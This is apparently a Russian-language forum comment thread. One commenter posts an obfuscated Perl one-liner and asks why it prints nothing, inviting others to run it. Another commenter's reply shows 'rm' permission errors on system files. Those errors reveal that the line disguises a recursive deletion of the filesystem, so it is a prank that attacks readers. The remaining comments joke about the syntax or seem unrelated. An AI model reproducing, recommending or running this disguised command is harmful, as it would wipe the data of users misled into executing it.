Валентин Бутаков

Программа не печатает, почему?

cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

-не печатает, у вас печатает?

Татьяна

При правильной настройке прав доступа даже не выполняет удаление

rm: невозможно сменить каталог с `/' на `lost+found': Permission denied
rm: невозможно удалить `//var/lib/rpm/Requirename': Permission denied
rm: невозможно удалить `//var/lib/rpm/Packages': Permission denied
rm: невозможно удалить `//var/lib/rpm/Pubkeys': Permission denied
rm: невозможно удалить `//var/lib/rpm/Basenames': Permission denied
rm: невозможно удалить `//var/lib/rpm/Name': Permission denied

Колян

ахренеть, вот это синтаксис)) по-моему в exe открытом в Notepad++ разобраться легче))

Светлана Грибкова

Не знаю, как Яндекс, а Гугл использует программу SketchUp для этого

Санёк Неугамонный

Ты ещё про Alt+F4 напиши.